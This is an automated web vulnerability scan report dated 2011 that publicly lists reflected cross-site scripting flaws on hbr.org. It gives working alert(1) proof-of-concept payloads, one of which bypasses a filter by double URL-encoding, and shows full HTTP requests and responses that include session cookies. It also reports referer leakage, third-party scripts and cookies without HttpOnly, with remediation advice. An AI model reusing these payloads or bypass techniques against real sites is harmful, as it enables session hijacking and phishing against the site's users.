XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, hbr.org Report generated by XSS.CX at Thu Nov 10 10:07:22 CST 2011.
Loading
1. Cross-site scripting (reflected)
1.1. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG [Nao parameter]
1.2. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr [REST URL parameter 7]
2. Cross-domain Referer leakage
3. Cross-domain script include
4. Cookie without HttpOnly flag set
4.1. http://hbr.org/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAFjizhSBAADHgGV
4.2. http://hbr.org/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/extended_classes.xcss/DATB/eAFjizhSBAADHgGV
4.3. http://hbr.org/hbrg-main/resources/css/jquery-ui-1.8.10.custom.css
4.4. http://hbr.org/hbrg-main/resources/css/marketing/baynote.css
4.5. http://hbr.org/hbrg-main/resources/css/marketing/jquery.fancybox-1.3.1.css
4.6. http://hbr.org/hbrg-main/resources/css/reset.css
4.7. http://hbr.org/hbrg-main/resources/css/stay_connected.css
4.8. http://hbr.org/hbrg-main/resources/css/style.css
4.9. http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html
4.10. http://hbr.org/hbrg-main/resources/images/favicon.ico
4.11. http://hbr.org/hbrg-main/resources/images/generic_product_images/case_study_100.gif
4.12. http://hbr.org/hbrg-main/resources/images/hbrPrintLogo.gif
4.13. http://hbr.org/hbrg-main/resources/images/marketing/baynote/bnCustomersWhoViewedBack.gif
4.14. http://hbr.org/hbrg-main/resources/images/marketing/houseads/HBR_On_Sept2011_300x100.gif
4.15. http://hbr.org/hbrg-main/resources/images/marketing/houseads/HBRspotlight_10470_300x100.gif
4.16. http://hbr.org/hbrg-main/resources/images/marketing/houseads/ad_hbr_feedback_300x100.gif
4.17. http://hbr.org/hbrg-main/resources/images/marketing/houseads/ad_web_Stress_v1_300x100.gif
4.18. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_buzz.png
4.19. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_facebook.png
4.20. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_iphone.png
4.21. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_linkedin.png
4.22. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_newsletters.png
4.23. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_rss.png
4.24. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_twitter.png
4.25. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_youtube.png
4.26. http://hbr.org/hbrg-main/resources/images/marketing/sub-touts/sub_tout_10062011.jpg
4.27. http://hbr.org/hbrg-main/resources/images/mastheadNavBg_w11.gif
4.28. http://hbr.org/hbrg-main/resources/images/mastheadSearchForm_submit.gif
4.29. http://hbr.org/hbrg-main/resources/images/store_header.gif
4.30. http://hbr.org/hbrg-main/resources/scripts/coremetrics/cmdatatagutils.min.js
4.31. http://hbr.org/hbrg-main/resources/scripts/coremetrics/v40/eluminate.js
4.32. http://hbr.org/hbrg-main/resources/scripts/hbrg/google_book_preview_check.js
4.33. http://hbr.org/hbrg-main/resources/scripts/marketing/baynote.js
4.34. http://hbr.org/hbrg-main/resources/scripts/marketing/marketing.min.js
4.35. http://hbr.org/hbrg-main/resources/scripts/most-jsonp.js
4.36. http://hbr.org/hbrg-main/resources/scripts/paywall.js
4.37. http://hbr.org/hbrg-main/resources/scripts/plugins.min.js
4.38. http://hbr.org/hbrg-main/resources/scripts/scripts.min.js
4.39. http://hbr.org/hbrg-main/resources/scripts/search-supplemental.js
4.40. http://hbr.org/hbrg-main/resources/scripts/subscriber-search.js
4.41. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
4.42. http://hbr.org/products/12795-PDF-ENG/thumbnail/thumbnail.gif
4.43. http://hbr.org/products/13292-PDF-ENG/thumbnail/thumbnail.gif
4.44. http://hbr.org/products/1915-PBK-ENG/thumbnail/thumbnail.gif
4.45. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
4.46. http://hbr.org/service/restv1/usersession/clickStream
4.47. http://hbr.org/service/restv1/usersession/displayChallenge
5. Content type incorrectly stated
5.1. http://hbr.org/hbrg-main/resources/images/favicon.ico
5.2. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
1. Cross-site scripting (reflected)
next
There are 2 instances of this issue:
Issue background
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method). The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised. User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
1.1. http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG [Nao parameter]
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://hbr.org
Path:
/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
Issue detail
The value of the Nao request parameter is copied into an HTML comment. The payload f5175--><script>alert(1)</script>f312a248b4f was submitted in the Nao parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10f5175--><script>alert(1)</script>f312a248b4f HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.navfund.com/resources
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:11:17 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Set-Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:11:17 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:11:17 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 47634 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]... <a href="/shopping-cart/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10f5175--><script>alert(1)</script>f312a248b4f ">...[SNIP]...
1.2. http://hbr.org/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr [REST URL parameter 7]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://hbr.org
Path:
/service/restv1/most-popular/daily/most_hbr/10/mostResphdlr
Issue detail
The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload a97fd%253cscript%253ealert%25281%2529%253c%252fscript%253e7555d97a7c3 was submitted in the REST URL parameter 7. This input was echoed as a97fd<script>alert(1)</script>7555d97a7c3 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 7 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /service/restv1/most-popular/daily/most_hbr/10/mostResphdlra97fd%253cscript%253ealert%25281%2529%253c%252fscript%253e7555d97a7c3 ?_=1320847772502 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive X-Requested-With: XMLHttpRequest Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:10:53 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 Content-Type: text/plain; charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:10:53 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 1507 mostResphdlra97fd<script>alert(1)</script>7555d97a7c3 ([{"pageUrl":"http://blogs.hbr.org/schwartz/2011/11/four-destructive-myths-most-co.html","pageTitle":"Four Destructive Myths Most Companies Still Live By - Tony Schwartz - Harvard Business Review","pag...[SNIP]...
2. Cross-domain Referer leakage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
Issue detail
The page was loaded from a URL containing a query string:http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 The response contains the following links to other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js http://edge.quantserve.com/quant.js http://ethnio.com/remotes/19144 http://feeds.harvardbusiness.org/harvardbusiness http://harvardbusiness.org/ http://harvardbusiness.org/about http://harvardbusiness.org/about/copyright-information http://harvardbusiness.org/about/privacy-policy http://harvardbusiness.org/careers http://harvardbusiness.org/newsroom http://harvardbusinessreview.ugc.bazaarvoice.com/static/9072-en_us/bvapi.js http://hbsp.harvard.edu/ http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=152022135 http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=280272386 http://pixel.quantserve.com/pixel/p-6dSQpqwKunJIM.gif http://twitter.com/HarvardBiz http://use.typekit.com/xtw4yuk.js http://ww3.harvardbusiness.org/corporate/ http://www.accelacomm.com/jaw/stayconnected/72/50246540/ http://www.accelacomm.com/jaw/stayconnected/72/50269290/ http://www.exed.hbs.edu/ http://www.facebook.com/HBR http://www.facebook.com/plugins/activity.php?site=hbr.org&width=300&height=300&header=false&colorscheme=light&font=arial&border_color=%23C8C6C7&recommendations=false http://www.google.com/profiles/HarvardBizBuzz http://www.hbs.edu/ http://www.linkedin.com/groups?gid=3044917 http://www.quantcast.com/p-6dSQpqwKunJIM http://www.trademark.harvard.edu/trademark_protection/notice.php http://www.youtube.com/HarvardBusiness https://secure.customersvc.com/servlet/Show?WESPAGE=OrderPages/harvard/ho/0912/order_1701.jsp&MSRSMAG=HR&MSCCMPLX=footer https://secure.customersvc.com/servlet/Show?WESPAGE=OrderPages/harvard/ho/1012/order_0101.jsp&MSRSMAG=HR&MSCCMPLX=rgprompt
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form. If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise. You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application. Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure. Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.navfund.com/resources
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:17 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Set-Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:09:17 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:17 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 47236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]... <!-- typekit --> <script type="text/javascript" src="//use.typekit.com/xtw4yuk.js"> </script>...[SNIP]... <!-- baynote --> <script type="text/javascript" src="//harvardbusinessreview.ugc.bazaarvoice.com/static/9072-en_us/bvapi.js"> </script>...[SNIP]... <li><a href="http://harvardbusiness.org"> Harvard Business Publishing</a>...[SNIP]... <li><a href="http://hbsp.harvard.edu/"> For Educators</a>...[SNIP]... <li><a href="http://ww3.harvardbusiness.org/corporate/"> For Corporate Buyers</a>...[SNIP]... <li><a href="http://www.hbs.edu/"> Visit Harvard Business School</a>...[SNIP]... <li id="twitterLink"><a href="http://twitter.com/HarvardBiz" title="Twitter"> <span>...[SNIP]... <li id="faceBookLink"><a href="http://www.facebook.com/HBR" title="FaceBook"> <span>...[SNIP]... <li id="linkedInLink"><a href="http://www.linkedin.com/groups?gid=3044917" title="LinkedIn"> <span>...[SNIP]... </strong> at <a href="http://hbsp.harvard.edu"> hbsp.harvard.edu</a>...[SNIP]... </strong> Tell your instructors about the savings at <a href="http://hbsp.harvard.edu"> hbsp.harvard.edu</a>...[SNIP]... </h5><iframe src="http://www.facebook.com/plugins/activity.php?site=hbr.org&width=300&height=300&header=false&colorscheme=light&font=arial&border_color=%23C8C6C7&recommendations=false" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"> </iframe>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://www.facebook.com/HBR"> <img src="/hbrg-main/resources/images/marketing/sc/sc_facebook.png" width="51" height="50" border="0" alt="Facebook" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://www.facebook.com/HBR"> Facebook</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://twitter.com/HarvardBiz"> <img src="/hbrg-main/resources/images/marketing/sc/sc_twitter.png" width="51" height="50" border="0" alt="Twitter" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://twitter.com/HarvardBiz"> Twitter</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://feeds.harvardbusiness.org/harvardbusiness"> <img src="/hbrg-main/resources/images/marketing/sc/sc_rss.png" width="51" height="50" border="0" alt="RSS" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://feeds.harvardbusiness.org/harvardbusiness"> RSS</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://www.linkedin.com/groups?gid=3044917"> <img src="/hbrg-main/resources/images/marketing/sc/sc_linkedin.png" width="51" height="50" border="0" alt="LinkedIn" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://www.linkedin.com/groups?gid=3044917"> LinkedIn</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://www.youtube.com/HarvardBusiness"> <img src="/hbrg-main/resources/images/marketing/sc/sc_youtube.png" width="51" height="50" border="0" alt="YouTube" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://www.youtube.com/HarvardBusiness"> YouTube</a>...[SNIP]... <div class="stay_connected_item_icon"><a href="http://www.google.com/profiles/HarvardBizBuzz"> <img src="/hbrg-main/resources/images/marketing/sc/sc_buzz.png" width="51" height="50" border="0" alt="Google" />...[SNIP]... <div class="stay_connected_item_label"><a href="http://www.google.com/profiles/HarvardBizBuzz"> Google</a>...[SNIP]... <li><a href="http://www.accelacomm.com/jaw/stayconnected/72/50269290/"> Management Tip</a>...[SNIP]... <li><a href="http://www.accelacomm.com/jaw/stayconnected/72/50246540/"> The Daily Stat</a>...[SNIP]... <li><a href="https://secure.customersvc.com/servlet/Show?WESPAGE=OrderPages/harvard/ho/0912/order_1701.jsp&MSRSMAG=HR&MSCCMPLX=footer"> Subscribe</a>...[SNIP]... <li><a href="http://feeds.harvardbusiness.org/harvardbusiness"> RSS Feed</a>...[SNIP]... <li><a href="http://twitter.com/HarvardBiz"> HBR on Twitter</a>...[SNIP]... <li><a href="http://www.facebook.com/HBR"> HBR on Facebook</a>...[SNIP]... <li><a href="http://www.youtube.com/HarvardBusiness"> HBR on YouTube</a>...[SNIP]... <li>Podcasts: <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=152022135"> Audio</a> and <a href="http://phobos.apple.com/WebObjects/MZStore.woa/wa/viewPodcast?id=280272386"> Video</a>...[SNIP]... <li><a href="http://harvardbusiness.org/newsroom"> Newsroom</a>...[SNIP]... <li><a href="http://www.hbs.edu/"> Harvard Business School</a>...[SNIP]... <li><a href="http://www.exed.hbs.edu/"> HBS Executive Education</a>...[SNIP]... <h5 id="hbpHeader"><a href="http://harvardbusiness.org/"> Harvard Business Publishing</a>...[SNIP]... <li><a href="http://harvardbusiness.org/about"> About Us</a>...[SNIP]... <li><a href="http://harvardbusiness.org/careers"> Careers</a>...[SNIP]... <li><a href="http://hbsp.harvard.edu/"> Higher Education</a>...[SNIP]... <li><a href="http://ww3.harvardbusiness.org/corporate/"> Corporate Learning</a>...[SNIP]... <div id="subFooterLogo"> <a href="http://harvardbusiness.org/"> <span>...[SNIP]... <li><a href="http://harvardbusiness.org/about"> About Us</a>...[SNIP]... <li><a href="http://harvardbusiness.org/about/privacy-policy"> Privacy Policy</a>...[SNIP]... <li><a href="http://harvardbusiness.org/about/copyright-information"> Copyright Information</a>...[SNIP]... <li><a href="http://www.trademark.harvard.edu/trademark_protection/notice.php"> Trademark Policy</a>...[SNIP]... <li><a href="http://harvardbusiness.org/"> Harvard Business Publishing</a>...[SNIP]... <li><a href="http://hbsp.harvard.edu/"> Higher Education</a>...[SNIP]... <li><a href="http://ww3.harvardbusiness.org/corporate/"> Corporate Learning</a>...[SNIP]... </h6> <a href="https://secure.customersvc.com/servlet/Show?WESPAGE=OrderPages/harvard/ho/1012/order_0101.jsp&MSRSMAG=HR&MSCCMPLX=rgprompt"> Become a paid subscriber »</a>...[SNIP]... </div> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"> </script> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"> </script>...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="//edge.quantserve.com/quant.js"> </script>...[SNIP]... <noscript> <a href="//www.quantcast.com/p-6dSQpqwKunJIM" target="_blank"> <img src="//pixel.quantserve.com/pixel/p-6dSQpqwKunJIM.gif" style="display: none;" border="0" height="1" width="1" alt="Quantcast" /> </a>...[SNIP]... <!-- usability overlay --> <script language="javascript" src="http://ethnio.com/remotes/19144" type="text/javascript"> </script>...[SNIP]...
3. Cross-domain script include
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG
Issue detail
The response dynamically includes the following scripts from other domains:http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js http://edge.quantserve.com/quant.js http://ethnio.com/remotes/19144 http://harvardbusinessreview.ugc.bazaarvoice.com/static/9072-en_us/bvapi.js http://use.typekit.com/xtw4yuk.js
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user. If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
Request
GET /product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.navfund.com/resources
Response
HTTP/1.1 200 OK Set-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:17 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Set-Cookie: HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; Domain=hbr.org; Expires=Sat, 24-Dec-2011 14:09:17 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Cache-Control: max-age=0 Expires: Wed, 09 Nov 2011 14:09:17 GMT LEG: 5 Vary: Accept-Encoding Content-Length: 47236 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <hea...[SNIP]... <!-- typekit --> <script type="text/javascript" src="//use.typekit.com/xtw4yuk.js"> </script>...[SNIP]... <!-- baynote --> <script type="text/javascript" src="//harvardbusinessreview.ugc.bazaarvoice.com/static/9072-en_us/bvapi.js"> </script>...[SNIP]... </div> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"> </script> <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jqueryui/1.8.13/jquery-ui.min.js"> </script>...[SNIP]... <!-- Start Quantcast tag --> <script type="text/javascript" src="//edge.quantserve.com/quant.js"> </script>...[SNIP]... <!-- usability overlay --> <script language="javascript" src="http://ethnio.com/remotes/19144" type="text/javascript"> </script>...[SNIP]...
4. Cookie without HttpOnly flag set
previous
next
There are 47 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive. You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
4.1. http://hbr.org/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAFjizhSBAADHgGV
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAFjizhSBAADHgGV
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /a4j_3_2_0-SNAPSHOTorg/richfaces/renderkit/html/css/basic_classes.xcss/DATB/eAFjizhSBAADHgGV HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:18 GMT X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5 X-Powered-By: JSF/1.2 Last-Modified: Tue, 08 Nov 2011 13:08:44 GMT Cache-control: max-age=86400 Expires: Thu, 10 Nov 2011 14:09:18 GMT Content-Type: text/css;charset=ISO-8859-1 LEG: 5 Vary: Accept-Encoding Content-Length: 6685 .rich-container input,.rich-input,.rich-container select,.rich-select,.rich-container textarea,.rich-textarea,.rich-container button,.rich-button,.rich-container keygen,.rich-keygen,.rich-container is...[SNIP]...
